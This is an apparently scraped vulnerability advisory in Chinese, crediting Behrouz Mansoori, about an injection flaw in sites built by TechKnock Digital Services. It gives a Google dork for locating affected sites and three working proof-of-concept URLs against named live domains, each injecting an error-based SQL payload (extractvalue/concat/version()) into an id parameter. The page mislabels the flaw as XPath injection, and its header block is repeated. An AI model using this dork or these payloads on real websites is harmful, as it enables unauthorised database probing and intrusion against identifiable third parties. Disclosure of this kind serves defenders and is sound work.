TechKnock Digital Services - XPath注入漏洞

2025.05.24 behrouz mansoori (IR)

风险等级： 低

本地： 否

远程： 是

CVE： N/A

CWE： N/A

Dork： “Developed By TechKnock Digital Services.”

漏洞标题：TechKnock Digital Services - XPath注入漏洞

日期：2025-05-21

漏洞发现者：Behrouz Mansoori

Google Dork：“Developed By TechKnock Digital Services.”

类别：webapps

测试环境：Mac, Firefox

概念验证：

演示：

1
2
3


http://rs-enterprises.co.in/category.php?id=2%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
http://www.rs-enterprises.co.in/product-detail.php?id=5%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+&catid=1
http://hailmaryrefrigeration.co.in/products.php?id=42%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+&catid=1

XPath注入漏洞技术分析

本文详细分析了TechKnock Digital Services存在的XPath注入漏洞，包含漏洞风险等级、利用方式、测试环境和具体的概念验证演示，涉及extractvalue函数利用和版本信息提取等技术细节。

TechKnock Digital Services - XPath注入漏洞

漏洞标题：TechKnock Digital Services - XPath注入漏洞

日期：2025-05-21

漏洞发现者：Behrouz Mansoori

Google Dork：“Developed By TechKnock Digital Services.”

类别：webapps

测试环境：Mac, Firefox

概念验证：

演示：

发现者：Behrouz mansoori

Instagram：Behrouz_mansoori

邮箱：mr.mansoori@yahoo.com